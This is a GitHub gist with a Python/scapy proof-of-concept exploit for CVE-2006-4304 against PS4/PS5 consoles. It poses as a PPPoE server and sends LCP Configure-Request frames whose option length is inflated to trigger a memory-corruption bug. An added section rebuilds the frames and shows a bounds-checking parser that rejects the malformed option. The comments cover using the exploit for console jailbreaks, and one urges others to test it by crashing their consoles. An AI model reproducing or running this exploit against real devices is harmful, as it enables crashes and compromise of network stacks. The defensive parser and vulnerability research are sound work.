@RobbedColek
Created January 30, 2024 16:02
PoC of CVE-2006-4304 for PS4/PS5
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump

# Fill in both MAC addresses as 12 hex digits; "XX" is a placeholder to be replaced.
source = bytes.fromhex("XXXXXXXXXXXX")       # MAC address of your adapter on PC
destination = bytes.fromhex("XXXXXXXXXXXX")  # MAC address of LAN on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2"  # get via "ipconfig /all", or eth0 or similar on Linux

# 1. Wait for the console's PADI and copy its Host-Uniq tag; the PoC assumes it is the
#    second tag in the PADI and is 8 bytes long (the hardcoded tag length 0x0008 below).
packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value
# 2. Answer with a PADO (code 0x07, session 0, length 12) echoing the Host-Uniq tag (type 0x0103)
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
# 3. Wait for the PADR, then confirm the session with a PADS (code 0x65, session id 1)
packet = sniff(iface=interface, filter="pppoed", count=1)
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
# 4. Wait for the first PPPoE session frame (the console's LCP Configure-Request)
packet = sniff(iface=interface, filter="pppoes", count=1)
# 5. LCP Configure-Request (PPP protocol 0xc021, code 1, id 1, length 7) carrying a single
#    option of type 0xab whose claimed length 0xff is far larger than the LCP packet itself
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
if packet is not None:   # srp1() returns None when nothing answers before the timeout
    hexdump(packet)      # hexdump() prints and returns None, so it is not wrapped in print()
# 6. Same frame with 256 bytes of filler appended, sent 20 times
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256  # this number might be different, just a guess
for i in range(20):
    sendp(payload, iface=interface)
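Added example, not code from the gist or its author: the same PPPoE discovery handshake and LCP frame rebuilt from fields with only the standard library, so the tag and length fields are computed instead of hardcoded, the Host-Uniq is picked out of the PADI by tag type rather than by list position, and an LCP option walker shows the bounds check that separates a safe parser from one that trusts the option's own length byte. The MAC addresses and the Host-Uniq value are constructed for the demo; the protocol constants are the values already visible in the PoC's byte strings. Note that the PoC hardcodes an LCP length of 7 and a PPPoE length of 9 for the malformed frame, whereas this builder derives both from the bytes actually present, so only the option length lies.

```python
import struct

# Protocol constants as they appear in the PoC's byte strings
ETH_PPPOE_DISC, ETH_PPPOE_SESS = 0x8863, 0x8864
PADI, PADO, PADR, PADS = 0x09, 0x07, 0x19, 0x65
TAG_SERVICE_NAME, TAG_HOST_UNIQ = 0x0101, 0x0103
PPP_LCP, LCP_CONF_REQ = 0xC021, 0x01
# Constructed addresses for the demo (hypothetical, not real hardware)
PC_MAC = bytes.fromhex("020000000001")
CONSOLE_MAC = bytes.fromhex("020000000002")
BROADCAST = b"\xff" * 6


def pppoe_discovery(dst, src, code, session_id, tags):
    """Ethernet + PPPoE discovery frame (ver 1, type 1); tags is a list of (type, value)."""
    body = b"".join(struct.pack("!HH", t, len(v)) + v for t, v in tags)
    hdr = struct.pack("!HBBHH", ETH_PPPOE_DISC, 0x11, code, session_id, len(body))
    return dst + src + hdr + body


def discovery_tags(frame):
    """Map tag type -> value for a PPPoE discovery frame, bounded by the PPPoE length field."""
    if struct.unpack_from("!H", frame, 12)[0] != ETH_PPPOE_DISC:
        raise ValueError("not a PPPoE discovery frame")
    _vt, _code, _sid, length = struct.unpack_from("!BBHH", frame, 14)
    off, end, tags = 20, 20 + length, {}
    if end > len(frame):
        raise ValueError("PPPoE length exceeds frame")
    while off + 4 <= end:
        t, ln = struct.unpack_from("!HH", frame, off)
        if off + 4 + ln > end:
            raise ValueError("tag runs past PPPoE payload")
        tags[t] = frame[off + 4:off + 4 + ln]
        off += 4 + ln
    return tags


def lcp_configure_request(dst, src, session_id, ident, options):
    """PPPoE session frame carrying an LCP Configure-Request. options is a list of
    (type, claimed_length, value); the length is emitted verbatim so it can lie."""
    opts = b"".join(struct.pack("!BB", t, ln) + v for t, ln, v in options)
    lcp = struct.pack("!BBH", LCP_CONF_REQ, ident, 4 + len(opts)) + opts
    ppp = struct.pack("!H", PPP_LCP) + lcp
    hdr = struct.pack("!HBBHH", ETH_PPPOE_SESS, 0x11, 0x00, session_id, len(ppp))
    return dst + src + hdr + ppp


def lcp_from_session_frame(frame):
    """Strip Ethernet (14), PPPoE (6) and PPP protocol (2) headers; return the LCP packet."""
    ethertype, = struct.unpack_from("!H", frame, 12)
    proto, = struct.unpack_from("!H", frame, 20)
    if ethertype != ETH_PPPOE_SESS or proto != PPP_LCP:
        raise ValueError("not a PPPoE session frame carrying LCP")
    return frame[22:]


def walk_lcp_options(lcp):
    """Parse Configure-Request options with the check a safe parser needs: every option
    must lie entirely inside the length the LCP header declares."""
    code, ident, length = struct.unpack_from("!BBH", lcp, 0)
    if length < 4 or length > len(lcp):
        raise ValueError("LCP length inconsistent with packet size")
    off, opts = 4, []
    while off < length:
        if off + 2 > length:
            raise ValueError("truncated option header")
        t, ln = lcp[off], lcp[off + 1]
        if ln < 2 or off + ln > length:
            raise ValueError(f"option 0x{t:02x} claims {ln} bytes, {length - off} remain")
        opts.append((t, lcp[off + 2:off + ln]))
        off += ln
    return opts


def demo():
    """Rebuild the PoC's frames from fields and show the malformed option being rejected."""
    host_uniq = bytes(range(8))  # constructed; the PoC copies it from the console's PADI
    padi = pppoe_discovery(BROADCAST, CONSOLE_MAC, PADI, 0,
                           [(TAG_SERVICE_NAME, b""), (TAG_HOST_UNIQ, host_uniq)])
    echoed = discovery_tags(padi)[TAG_HOST_UNIQ]  # select by tag type, not list index
    pado = pppoe_discovery(CONSOLE_MAC, PC_MAC, PADO, 0, [(TAG_HOST_UNIQ, echoed)])
    pads = pppoe_discovery(CONSOLE_MAC, PC_MAC, PADS, 1, [(TAG_HOST_UNIQ, echoed)])
    bad = lcp_configure_request(CONSOLE_MAC, PC_MAC, 1, 1, [(0xAB, 0xFF, b"")])
    try:
        walk_lcp_options(lcp_from_session_frame(bad))
        rejected = False
    except ValueError as e:
        rejected = True
        print("rejected:", e)
    return pado, pads, bad, rejected


if __name__ == "__main__":
    demo()
```

The PADO and PADS produced by `pppoe_discovery` are byte-for-byte the frames the PoC hardcodes (with the hypothetical MACs and Host-Uniq substituted), which is a quick way to confirm the hand-assembled lengths before sending anything; `walk_lcp_options` is what a receiver has to do before touching option bytes, and the PoC's `ab ff` option is exactly the case it rejects.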
@8pcd commented Feb 1, 2024

Bro, it's a PoC, meaning piece of concept; no full jailbreak, you have to wait!

@Sergb1970 commented Feb 1, 2024

Does the cable need to be straight or reverse?

@MRiCEQB commented Feb 1, 2024

Does the cable need to be straight or reverse?

PS4/5 can do Auto MDI-X, so it doesn't matter.

@lollipop6969

Proof of concept.

@Drocto1231

Will 11.02 be available?

@lewiwiii commented Feb 2, 2024

Will 11.02 be available?

No, this bug has been patched in 11.02.

@mbcrump commented Feb 6, 2024

I've made a video showing how to set this up from scratch if anyone is interested.

https://www.youtube.com/watch?v=RbGOJGAD0xQ

@unaigonzalezz

If anyone is curious, it's working on PS5 7.61.

@sunzhi778

zero zero zero zero

@mmano87 commented Mar 2, 2024

I tried it on PS3 and it freezes (sometimes) on the boot screen.

@mmano87 commented Mar 2, 2024

Received 2 packets, got 1 answers, remaining 0 packets

@speedyes commented Apr 9, 2024

Works only after setting up PPPoE for the first time or after changing the username/password there. But yeah, just tested with 11.00 and it does work.

@unaigonzalezz

We have more info on HackerOne about this vuln: https://hackerone.com/reports/2177925. Thanks to TheFl0w.

@prashantballal1

My PS5 software version is 23.02-08 20.02.06-00.00.00.01. Can I still jailbreak my console, or did I miss the opportunity?

@unaigonzalezz

My PS5 software version is 23.02-08 20.02.06-00.00.00.01. Can I still jailbreak my console, or did I miss the opportunity?

You're still in scope for a future jailbreak; wait for an exploit and don't update your console.

@MRiCEQB commented May 7, 2024

My PS5 software version is 23.02-08 20.02.06-00.00.00.01. Can I still jailbreak my console, or did I miss the opportunity?

You're still in scope for a future jailbreak; wait for an exploit and don't update your console.

Is it confirmed that it works on both 8.20 versions?

@prashantballal1

You're still in scope for a future jailbreak; wait for an exploit and don't update your console.

Ok, I will wait. I am not gonna update my console ever.

@prashantballal1 commented May 7, 2024

Is it confirmed that it works on both 8.20 versions?

What do you mean "works on both 8.20 versions"? Are you asking or telling us?

@MRiCEQB commented May 7, 2024

What do you mean "works on both 8.20 versions"? Are you asking or telling us?

I was asking @unaigonzalezz because there are two different 8.20 FW versions.

There is 8.20.00 and there is 8.20.02 like yours.
Unfortunately theflow only said 8.20, which could either mean both or only 8.20.00.

@prashantballal1 commented May 7, 2024

I was asking @unaigonzalezz because there are two different 8.20 FW versions.

There is 8.20.00 and there is 8.20.02 like yours. Unfortunately theflow only said 8.20, which could either mean both or only 8.20.00.

Sorry that I didn't know more about jailbreaking stuff. In the past, I used 9.00 on my PS4 Slim, and after a long, long time I got one more chance to use a jailbreak; hopefully when TheFlow says 8.20 it includes all the versions.

@unaigonzalezz

I actually don't know, but if it is .02 it's a small change, so I don't think it is the error patch. I'm not truly sure, though, so the best thing you guys can do is test this script: if it crashes your console, the future exploit should work too.
